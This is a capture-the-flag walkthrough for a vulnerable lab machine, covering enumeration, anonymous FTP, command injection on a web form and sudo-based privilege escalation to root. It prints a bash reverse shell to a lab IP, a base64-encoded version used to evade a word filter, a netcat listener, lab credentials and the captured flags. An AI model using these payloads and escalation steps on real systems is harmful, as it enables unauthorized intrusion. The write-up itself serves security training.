Enumeration

nmap -sC -sV -p- 192.168.253.131
-sC for default scripts,-sV for version enumeration and -p- to scan all
ports.

Open Ports
port 21 ftp (anonymous login enabled)
port 1337
port 7331 http

Lets login to ftp with anonymous:anonymous .
After login, we can see files creds.txt game.txt message.txt

Lets download these 3 files. using get command.

reading the files gives us some interesting info.

nitu:81299

oh and I forgot to tell you I’ve setup a game for you on port 1337. See if you can reach to the final level and get the prize.

@nitish81299 I am going on holidays for few days, please take care of all the work. And don’t mess up anything.

Lets visit port 7331

Visiting the port 7331 reveals us a simple http site.

Running gobuster reveals us two directory /wish and /genie

There is nothing special in /genie web directory

At /wish we have uption to enter commands. We dont know if we can execute the entered commands.
Lets try by entering ls to list the files in current directory.

After entering ls command we are redirected to error 403 page.

Upon looking closely we can see the files present in current directory.
For this enter ctrl + A , this should select all the text, revealing the command result which was hidden.

Now we know we can enter and execute commands.
With this info, we can execute a reverse shell to get ourself shell.

For the reverse shell I will be using
bash -i >& /dev/tcp/192.168.253.128/8080 0>&1

This code is available at: https://pentestmonkey.net/tools/web-shells/php-reverse-shell

Make sure to change the ip to your attacker machine ip. And remember the port number , we will need this to setup netcat listner

Set up netcat listner using nc -lnvp 8080

There is problem, when we enter the above reverse shell, command is not executed, there is some kind of filters for certain words.

After researching for a while I found we can bypass this filter by encoding this reverse shell into base64 format.

Now use above command to encode the reverse shell into base64 format
copy the output

To execute this command ,

echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjI1My4xMjgvODA4MCAwPiYxCg== | base64 -d | bash

Submit this code

And we should have ourself shell access as www-data

upgrade your shell using

python -c 'import pty; pty.spawn("/bin/bash")'

There is user.txt first flag inside home directory of nitish. We dont have permission to read the flag.

Looking into .dev directory we have file named creds.txt which contains credentials of user nitish

nitish:p4ssw0rdStr3r0n9

lets switch user to nitish and read the user.txt

10aay8289ptgguy1pvfa73alzusyyx3c

using command sudo -l reveals, we can run /usr/bin/genie as user sam.

I tried to using arguments displayed to execute command, but none of the argument were working, So I was out of idea.

Then I used command strings /usr/bin/genie to print the strings of printable characters in files.

Here we have something interesting argument which we didn’t found early in help option. -cmd

Using this argument gives us a shell as user sam

Then I again ran sudo -l which revealed, I can run /root/lago as user root

Running the lago file reveals we have to enter a choice, I tried all of it with an aim to get root shell or to execute command, but non worked.

Upon further digging we can see “.pyc” in Sam’s home directory. This looks interesting..

First I used strings command to examine the contents, but didn’t helped.

Then I downloaded this .pyc into my kali linux to further work on it,
When I used uncompyl6 tool . I found a interesting function

def guessit():
    num = randint(1, 101)
    print 'Choose a number between 1 to 100: '
    s = input('Enter your number: ')
    if s == num:
        system('/bin/sh')
    else:
        print 'Better Luck next time'

we have root shell and read the proof.txt file which completes this machine

33eur2wjdmq80z47nyy4fx54bnlg3ibc

For any correction / query /suggestion contact on
Instagram dollarboysushil
Twitter (X) dollarboysushil
Youtube dollarboysushil